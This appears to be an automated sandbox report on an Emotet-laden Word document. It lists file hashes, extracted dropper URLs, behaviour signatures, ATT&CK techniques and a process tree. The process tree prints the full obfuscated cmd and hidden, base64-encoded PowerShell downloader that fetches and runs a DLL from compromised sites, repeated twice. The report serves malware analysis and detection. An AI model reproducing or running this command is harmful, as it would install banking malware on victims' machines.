005b7211dfe87b486935e4f2523309116f0bf184618277df6a5d2eafc326841b

General

Target

emotet_e2_005b7211dfe87b486935e4f2523309116f0bf184618277df6a5d2eafc326841b_2021-01-12__222259996452._doc.doc
Size

157KB
MD5

a7bcbd78fc4dfbc4f25b2a74e0d5aba6
SHA1

ac11643c69b015ecc57ac529fd84ab5ca5859c57
SHA256

005b7211dfe87b486935e4f2523309116f0bf184618277df6a5d2eafc326841b
SHA512

87901bd5560f943bfa5269441902b7b0c7b7d1c0f6b4fd2b6c88a9a3e98585dd3a36e9584353c7c7f3812a3db416373247ee6002d8960467e5b635121fdec360

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://remediis.com/t/gm2X/

exe.dropper

http://avadnansahin.com/wp-includes/w/

exe.dropper

http://solicon.us/allam-cycle-1c4gn/f5z/

exe.dropper

http://www.riparazioni-radiotv.com/softaculous/DZz/

exe.dropper

http://www.agricampeggiocortecomotto.it/wp-admin/s7p1/

exe.dropper

https://www.starlingtechs.com/GNM/

exe.dropper

http://hellas-darmstadt.de/cgi-bin/ZSoo/

Signatures

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 708 2992 cmd.exe
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exerundll32.exe

flow pid process

20 3352 powershell.exe
31 640 rundll32.exe
Loads dropped DLL 2 IoCs

Processes:

rundll32.exerundll32.exe

pid process

4084 rundll32.exe
4492 rundll32.exe
Drops file in System32 directory 1 IoCs

Processes:

rundll32.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\Nurex\xokgeolm.xpb rundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	708	2992	cmd.exe

flow	pid	process
20	3352	powershell.exe
31	640	rundll32.exe

pid	process
4084	rundll32.exe
4492	rundll32.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\Nurex\xokgeolm.xpb	rundll32.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

4680 WINWORD.EXE
4680 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exerundll32.exe

pid process

3352 powershell.exe
3352 powershell.exe
3352 powershell.exe
640 rundll32.exe
640 rundll32.exe
640 rundll32.exe
640 rundll32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 3352 powershell.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXE

pid process

4680 WINWORD.EXE
4680 WINWORD.EXE
4680 WINWORD.EXE
4680 WINWORD.EXE
4680 WINWORD.EXE
4680 WINWORD.EXE
4680 WINWORD.EXE

pid	process
4680	WINWORD.EXE
4680	WINWORD.EXE

pid	process
3352	powershell.exe
3352	powershell.exe
3352	powershell.exe
640	rundll32.exe
640	rundll32.exe
640	rundll32.exe
640	rundll32.exe

description	pid	process
Token: SeDebugPrivilege	3352	powershell.exe

pid	process
4680	WINWORD.EXE
4680	WINWORD.EXE
4680	WINWORD.EXE
4680	WINWORD.EXE
4680	WINWORD.EXE
4680	WINWORD.EXE
4680	WINWORD.EXE

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

cmd.exepowershell.exerundll32.exerundll32.exerundll32.exerundll32.exe

description	pid	process	target process
PID 708 wrote to memory of 3280	708	cmd.exe	msg.exe
PID 708 wrote to memory of 3280	708	cmd.exe	msg.exe
PID 708 wrote to memory of 3352	708	cmd.exe	powershell.exe
PID 708 wrote to memory of 3352	708	cmd.exe	powershell.exe
PID 3352 wrote to memory of 4068	3352	powershell.exe	rundll32.exe
PID 3352 wrote to memory of 4068	3352	powershell.exe	rundll32.exe
PID 4068 wrote to memory of 4084	4068	rundll32.exe	rundll32.exe
PID 4068 wrote to memory of 4084	4068	rundll32.exe	rundll32.exe
PID 4068 wrote to memory of 4084	4068	rundll32.exe	rundll32.exe
PID 4084 wrote to memory of 4492	4084	rundll32.exe	rundll32.exe
PID 4084 wrote to memory of 4492	4084	rundll32.exe	rundll32.exe
PID 4084 wrote to memory of 4492	4084	rundll32.exe	rundll32.exe
PID 4492 wrote to memory of 660	4492	rundll32.exe	rundll32.exe
PID 4492 wrote to memory of 660	4492	rundll32.exe	rundll32.exe
PID 4492 wrote to memory of 660	4492	rundll32.exe	rundll32.exe
PID 660 wrote to memory of 640	660	rundll32.exe	rundll32.exe
PID 660 wrote to memory of 640	660	rundll32.exe	rundll32.exe
PID 660 wrote to memory of 640	660	rundll32.exe	rundll32.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e2_005b7211dfe87b486935e4f2523309116f0bf184618277df6a5d2eafc326841b_2021-01-12__222259996452._doc.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4680

C:\Windows\system32\cmd.exe
cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEAAJwArACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAKAAnAHYAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAGEAZwByACcAKwAnAGkAJwArACcAYwBhAG0AcAAnACsAJwBlAGcAJwApACsAKAAnAGcAaQAnACsAJwBvACcAKwAnAGMAbwByACcAKQArACgAJwB0AGUAJwArACcAYwBvAG0AbwAnACkAKwAnAHQAdAAnACsAJwBvAC4AJwArACgAJwBpAHQAJwArACcALwAnACkAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAJwArACcAZABtACcAKQArACgAJwBpACcAKwAnAG4AJwArACcALwBzADcAJwArACcAcAAxAC8AQAB3AF0AJwArACcAeABtAFsAJwApACsAJwB2ACcAKwAnAHMAOgAnACsAJwAvAC8AJwArACcAdwB3ACcAKwAnAHcAJwArACgAJwAuAHMAdABhAHIAbAAnACsAJwBpACcAKwAnAG4AJwApACsAKAAnAGcAdABlAGMAaABzAC4AYwBvAG0AJwArACcALwAnACsAJwBHAE4ATQAnACsAJwAvAEAAdwAnACsAJwBdAHgAbQBbAHYAJwApACsAKAAnADoAJwArACcALwAnACsAJwAvAGgAZQBsAGwAYQBzACcAKQArACgAJwAtAGQAJwArACcAYQByAG0AcwAnACsAJwB0AGEAZAAnACsAJwB0AC4AZAAnACsAJwBlACcAKQArACcALwBjACcAKwAoACcAZwBpAC0AYgBpAG4AJwArACcALwBaACcAKQArACcAUwAnACsAKAAnAG8AJwArACcAbwAvACcAKQApAC4AIgByAEUAcABsAEEAYABjAGUAIgAoACgAKAAnAHcAXQB4AG0AJwArACcAWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAJwArACcAdwBmACcAKQApACwAKAAnAHcAZQAnACsAKAAnAHYAdwAnACsAJwBlACcAKQApACkALAAoACcAYQBlACcAKwAnAGYAZgAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKQBbADIAXQApAC4AIgBTAGAAUABMAEkAdAAiACgAJABPADUAXwBZACAAKwAgACQASgBiAHoAMwB5AGEAYQAgACsAIAAkAEwAXwAwAEMAKQA7ACQAVgAxADEAVgA9ACgAJwBIACcAKwAoACcAXwA4ACcAKwAnAE0AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE0AbAA5AHgAdwA3AG0AIABpAG4AIAAkAEoAaQB0AG8AYQAyAGUAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAHMAWQBTAHQAZQBtAC4ATgBFAFQALgB3AEUAQgBDAEwASQBFAG4AVAApAC4AIgBkAG8AVwBgAE4ATABPAGEARABGAEkAYABMAEUAIgAoACQATQBsADkAeAB3ADcAbQAsACAAJABHADYAYQBqAHYAOABkACkAOwAkAE0AMAA2AEsAPQAoACgAJwBBACcAKwAnADUAMQAnACkAKwAnAEIAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEcANgBhAGoAdgA4AGQAKQAuACIAbABgAEUATgBHAHQASAAiACAALQBnAGUAIAAzADAANAA0ADcAKQAgAHsAJgAoACcAcgAnACsAJwB1AG4AJwArACcAZABsAGwAMwAyACcAKQAgACQARwA2AGEAagB2ADgAZAAsACgAKAAnAFMAaAAnACsAJwBvACcAKQArACgAJwB3ACcAKwAnAEQAaQAnACsAJwBhAGwAbwAnACkAKwAnAGcAQQAnACkALgAiAHQAYABvAFMAVAByAGAASQBuAEcAIgAoACkAOwAkAFcANQAyAE0APQAoACgAJwBPADEAJwArACcAOQAnACkAKwAnAFIAJwApADsAYgByAGUAYQBrADsAJABLADgAMQBBAD0AKAAnAEUAJwArACgAJwA3ACcAKwAnADQARAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwA1ADIATgA9ACgAJwBZADcAJwArACcAMgBTACcAKQA=
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:708

C:\Windows\system32\msg.exe
msg Admin /v Word experienced an error trying to open the file.
2⤵
PID:3280

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEAAJwArACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAKAAnAHYAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAGEAZwByACcAKwAnAGkAJwArACcAYwBhAG0AcAAnACsAJwBlAGcAJwApACsAKAAnAGcAaQAnACsAJwBvACcAKwAnAGMAbwByACcAKQArACgAJwB0AGUAJwArACcAYwBvAG0AbwAnACkAKwAnAHQAdAAnACsAJwBvAC4AJwArACgAJwBpAHQAJwArACcALwAnACkAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAJwArACcAZABtACcAKQArACgAJwBpACcAKwAnAG4AJwArACcALwBzADcAJwArACcAcAAxAC8AQAB3AF0AJwArACcAeABtAFsAJwApACsAJwB2ACcAKwAnAHMAOgAnACsAJwAvAC8AJwArACcAdwB3ACcAKwAnAHcAJwArACgAJwAuAHMAdABhAHIAbAAnACsAJwBpACcAKwAnAG4AJwApACsAKAAnAGcAdABlAGMAaABzAC4AYwBvAG0AJwArACcALwAnACsAJwBHAE4ATQAnACsAJwAvAEAAdwAnACsAJwBdAHgAbQBbAHYAJwApACsAKAAnADoAJwArACcALwAnACsAJwAvAGgAZQBsAGwAYQBzACcAKQArACgAJwAtAGQAJwArACcAYQByAG0AcwAnACsAJwB0AGEAZAAnACsAJwB0AC4AZAAnACsAJwBlACcAKQArACcALwBjACcAKwAoACcAZwBpAC0AYgBpAG4AJwArACcALwBaACcAKQArACcAUwAnACsAKAAnAG8AJwArACcAbwAvACcAKQApAC4AIgByAEUAcABsAEEAYABjAGUAIgAoACgAKAAnAHcAXQB4AG0AJwArACcAWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAJwArACcAdwBmACcAKQApACwAKAAnAHcAZQAnACsAKAAnAHYAdwAnACsAJwBlACcAKQApACkALAAoACcAYQBlACcAKwAnAGYAZgAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKQBbADIAXQApAC4AIgBTAGAAUABMAEkAdAAiACgAJABPADUAXwBZACAAKwAgACQASgBiAHoAMwB5AGEAYQAgACsAIAAkAEwAXwAwAEMAKQA7ACQAVgAxADEAVgA9ACgAJwBIACcAKwAoACcAXwA4ACcAKwAnAE0AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE0AbAA5AHgAdwA3AG0AIABpAG4AIAAkAEoAaQB0AG8AYQAyAGUAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAHMAWQBTAHQAZQBtAC4ATgBFAFQALgB3AEUAQgBDAEwASQBFAG4AVAApAC4AIgBkAG8AVwBgAE4ATABPAGEARABGAEkAYABMAEUAIgAoACQATQBsADkAeAB3ADcAbQAsACAAJABHADYAYQBqAHYAOABkACkAOwAkAE0AMAA2AEsAPQAoACgAJwBBACcAKwAnADUAMQAnACkAKwAnAEIAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEcANgBhAGoAdgA4AGQAKQAuACIAbABgAEUATgBHAHQASAAiACAALQBnAGUAIAAzADAANAA0ADcAKQAgAHsAJgAoACcAcgAnACsAJwB1AG4AJwArACcAZABsAGwAMwAyACcAKQAgACQARwA2AGEAagB2ADgAZAAsACgAKAAnAFMAaAAnACsAJwBvACcAKQArACgAJwB3ACcAKwAnAEQAaQAnACsAJwBhAGwAbwAnACkAKwAnAGcAQQAnACkALgAiAHQAYABvAFMAVAByAGAASQBuAEcAIgAoACkAOwAkAFcANQAyAE0APQAoACgAJwBPADEAJwArACcAOQAnACkAKwAnAFIAJwApADsAYgByAGUAYQBrADsAJABLADgAMQBBAD0AKAAnAEUAJwArACgAJwA3ACcAKwAnADQARAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwA1ADIATgA9ACgAJwBZADcAJwArACcAMgBTACcAKQA=
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3352

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Kjl48kr\Nqm9ty9\S93E.dll,ShowDialogA
3⤵
- Suspicious use of WriteProcessMemory
PID:4068

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Kjl48kr\Nqm9ty9\S93E.dll,ShowDialogA
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4084

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Users\Admin\Kjl48kr\Nqm9ty9\S93E.dll",#1
5⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4492

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nurex\xokgeolm.xpb",myAjAcP
6⤵
- Suspicious use of WriteProcessMemory
PID:660

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Nurex\xokgeolm.xpb",#1
7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:640

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Kjl48kr\Nqm9ty9\S93E.dll
MD5
02375e219f4cfd598124fd7b6b648361

SHA1
a5338e5846319f3a382e26c9117801b339165f73

SHA256
72b086f75d7946a4c8637c69b007119f3aba5a9999074603807002e74716df21

SHA512
4d9a7ad55b1dad9358f957972c76f815a5f26382c66ff30264b5c76babfebf38f32eaebf9ff82d519def24bbc2b1124a0c954a21bcc87cb4817835e8bbe4ee69

Download Submit
\Users\Admin\Kjl48kr\Nqm9ty9\S93E.dll
MD5
02375e219f4cfd598124fd7b6b648361

SHA1
a5338e5846319f3a382e26c9117801b339165f73

SHA256
72b086f75d7946a4c8637c69b007119f3aba5a9999074603807002e74716df21

SHA512
4d9a7ad55b1dad9358f957972c76f815a5f26382c66ff30264b5c76babfebf38f32eaebf9ff82d519def24bbc2b1124a0c954a21bcc87cb4817835e8bbe4ee69

Download Submit
\Users\Admin\Kjl48kr\Nqm9ty9\S93E.dll
MD5
02375e219f4cfd598124fd7b6b648361

SHA1
a5338e5846319f3a382e26c9117801b339165f73

SHA256
72b086f75d7946a4c8637c69b007119f3aba5a9999074603807002e74716df21

SHA512
4d9a7ad55b1dad9358f957972c76f815a5f26382c66ff30264b5c76babfebf38f32eaebf9ff82d519def24bbc2b1124a0c954a21bcc87cb4817835e8bbe4ee69

Download Submit
memory/640-15-0x0000000000000000-mapping.dmp

Download
memory/660-14-0x0000000000000000-mapping.dmp

Download
memory/3280-3-0x0000000000000000-mapping.dmp

Download
memory/3352-5-0x00007FFEDDF40000-0x00007FFEDE92C000-memory.dmp

Filesize
9.9MB

Download
memory/3352-7-0x00000232EBD60000-0x00000232EBD61000-memory.dmp

Filesize
4KB

Download
memory/3352-6-0x00000232D3720000-0x00000232D3721000-memory.dmp

Filesize
4KB

Download
memory/3352-4-0x0000000000000000-mapping.dmp

Download
memory/4068-8-0x0000000000000000-mapping.dmp

Download
memory/4084-10-0x0000000000000000-mapping.dmp

Download
memory/4492-12-0x0000000000000000-mapping.dmp

Download
memory/4680-2-0x00007FFEE49A0000-0x00007FFEE4FD7000-memory.dmp

Filesize
6.2MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads